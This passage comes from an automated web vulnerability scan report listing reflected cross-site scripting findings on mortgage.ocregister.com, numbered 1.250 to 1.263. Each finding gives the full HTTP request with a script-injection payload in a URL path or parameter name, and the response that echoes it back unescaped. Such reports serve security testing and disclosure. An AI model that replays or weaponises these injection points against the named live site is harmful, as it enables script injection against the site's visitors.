User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cfaad\"><script>alert(1)</script>feb9e55050e/03/feed/" />
...[SNIP]...

1.250. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58700"><script>alert(1)</script>3e5461fd9e3 was submitted in the REST URL parameter 2. This input was echoed as 58700\"><script>alert(1)</script>3e5461fd9e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/0358700"><script>alert(1)</script>3e5461fd9e3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0358700\"><script>alert(1)</script>3e5461fd9e3/feed/" />
...[SNIP]...

1.251. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9aad'><script>alert(1)</script>c7ff9075973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9aad\\\'><script>alert(1)</script>c7ff9075973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/03/?c9aad'><script>alert(1)</script>c7ff9075973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/03/?c9aad\\\'><script>alert(1)</script>c7ff9075973=1&dem_add_user_answer=true&dem_poll_id=23' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.252. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf812"><script>alert(1)</script>a5833fbe6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf812\"><script>alert(1)</script>a5833fbe6d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/03/?bf812"><script>alert(1)</script>a5833fbe6d8=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/03/?bf812\"><script>alert(1)</script>a5833fbe6d8=1feed/" />
...[SNIP]...

1.253. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b2c"><script>alert(1)</script>fd2de0df0b8 was submitted in the REST URL parameter 1. This input was echoed as 88b2c\"><script>alert(1)</script>fd2de0df0b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200888b2c"><script>alert(1)</script>fd2de0df0b8/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200888b2c\"><script>alert(1)</script>fd2de0df0b8/04/feed/" />
...[SNIP]...

1.254. http://mortgage.ocregister.com/2008/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df03a"><script>alert(1)</script>12872902b15 was submitted in the REST URL parameter 2. This input was echoed as df03a\"><script>alert(1)</script>12872902b15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/04df03a"><script>alert(1)</script>12872902b15/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04df03a\"><script>alert(1)</script>12872902b15/feed/" />
...[SNIP]...

1.255. http://mortgage.ocregister.com/2008/04/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f116"><script>alert(1)</script>31b6d1dd7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f116\"><script>alert(1)</script>31b6d1dd7c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/04/?5f116"><script>alert(1)</script>31b6d1dd7c0=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04/?5f116\"><script>alert(1)</script>31b6d1dd7c0=1feed/" />
...[SNIP]...

1.256. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559a8"><script>alert(1)</script>09fc2a23169 was submitted in the REST URL parameter 1. This input was echoed as 559a8\"><script>alert(1)</script>09fc2a23169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008559a8"><script>alert(1)</script>09fc2a23169/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008559a8\"><script>alert(1)</script>09fc2a23169/05/feed/" />
...[SNIP]...

1.257. http://mortgage.ocregister.com/2008/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd2"><script>alert(1)</script>a1474685425 was submitted in the REST URL parameter 2. This input was echoed as 48dd2\"><script>alert(1)</script>a1474685425 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/0548dd2"><script>alert(1)</script>a1474685425/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0548dd2\"><script>alert(1)</script>a1474685425/feed/" />
...[SNIP]...

1.258. http://mortgage.ocregister.com/2008/05/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05d5"><script>alert(1)</script>c73cc1d7606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05d5\"><script>alert(1)</script>c73cc1d7606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/05/?d05d5"><script>alert(1)</script>c73cc1d7606=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/05/?d05d5\"><script>alert(1)</script>c73cc1d7606=1feed/" />
...[SNIP]...

1.259. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18c"><script>alert(1)</script>1d447106e74 was submitted in the REST URL parameter 1. This input was echoed as 3c18c\"><script>alert(1)</script>1d447106e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083c18c"><script>alert(1)</script>1d447106e74/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083c18c\"><script>alert(1)</script>1d447106e74/06/feed/" />
...[SNIP]...

1.260. http://mortgage.ocregister.com/2008/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31fd"><script>alert(1)</script>9ac39e7e120 was submitted in the REST URL parameter 2. This input was echoed as a31fd\"><script>alert(1)</script>9ac39e7e120 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/06a31fd"><script>alert(1)</script>9ac39e7e120/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06a31fd\"><script>alert(1)</script>9ac39e7e120/feed/" />
...[SNIP]...

1.261. http://mortgage.ocregister.com/2008/06/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a408"><script>alert(1)</script>fcc2185e786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a408\"><script>alert(1)</script>fcc2185e786 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/06/?2a408"><script>alert(1)</script>fcc2185e786=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06/?2a408\"><script>alert(1)</script>fcc2185e786=1feed/" />
...[SNIP]...

1.262. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>9837c07890b was submitted in the REST URL parameter 1. This input was echoed as 3fb2a\"><script>alert(1)</script>9837c07890b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083fb2a"><script>alert(1)</script>9837c07890b/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083fb2a\"><script>alert(1)</script>9837c07890b/07/feed/" />
...[SNIP]...

1.263. http://mortgage.ocregister.com/2008/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d875f"><script>alert(1)</script>52705fa9729 was submitted in the REST URL parameter 2. This input was echoed as d875f\"><script>alert(1)</script>52705fa9729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/07d875f"><script>alert(1)</script>52705fa9729/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
